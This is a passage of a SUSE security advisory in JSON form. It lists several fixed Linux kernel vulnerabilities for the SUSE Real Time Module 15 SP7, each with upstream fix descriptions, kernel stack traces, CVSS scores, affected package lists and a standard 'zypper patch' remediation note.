"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68215"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix PTP cleanup on driver removal in error path\n\nImprove the cleanup on releasing PTP resources in error path.\nThe error case might happen either at the driver probe and PTP\nfeature initialization or on PTP restart (errors in reset handling, NVM\nupdate etc). In both cases, calls to PF PTP cleanup (ice_ptp_cleanup_pf\nfunction) and \u0027ps_lock\u0027 mutex deinitialization were missed.\nAdditionally, ptp clock was not unregistered in the latter case.\n\nKeep PTP state as \u0027uninitialized\u0027 on init to distinguish between error\nscenarios and to avoid resource release duplication at driver removal.\n\nThe consequence of missing ice_ptp_cleanup_pf call is the following call\ntrace dumped when ice_adapter object is freed (port list is not empty,\nas it is required at this stage):\n\n[ T93022] ------------[ cut here ]------------\n[ T93022] WARNING: CPU: 10 PID: 93022 at\nice/ice_adapter.c:67 ice_adapter_put+0xef/0x100 [ice]\n...\n[ T93022] RIP: 0010:ice_adapter_put+0xef/0x100 [ice]\n...\n[ T93022] Call Trace:\n[ T93022] \u003cTASK\u003e\n[ T93022] ? ice_adapter_put+0xef/0x100 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n[ T93022] ? __warn.cold+0xb0/0x10e\n[ T93022] ? ice_adapter_put+0xef/0x100 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n[ T93022] ? report_bug+0xd8/0x150\n[ T93022] ? handle_bug+0xe9/0x110\n[ T93022] ? exc_invalid_op+0x17/0x70\n[ T93022] ? asm_exc_invalid_op+0x1a/0x20\n[ T93022] ? ice_adapter_put+0xef/0x100 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n[ T93022] pci_device_remove+0x42/0xb0\n[ T93022] device_release_driver_internal+0x19f/0x200\n[ T93022] driver_detach+0x48/0x90\n[ T93022] bus_remove_driver+0x70/0xf0\n[ T93022] pci_unregister_driver+0x42/0xb0\n[ T93022] ice_module_exit+0x10/0xdb0 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n...\n[ T93022] ---[ end trace 0000000000000000 ]---\n[ T93022] ice: module unloaded",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68215",
"url": "https://www.suse.com/security/cve/CVE-2025-68215"
},
{
"category": "external",
"summary": "SUSE Bug 1255226 for CVE-2025-68215",
"url": "https://bugzilla.suse.com/1255226"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68215"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
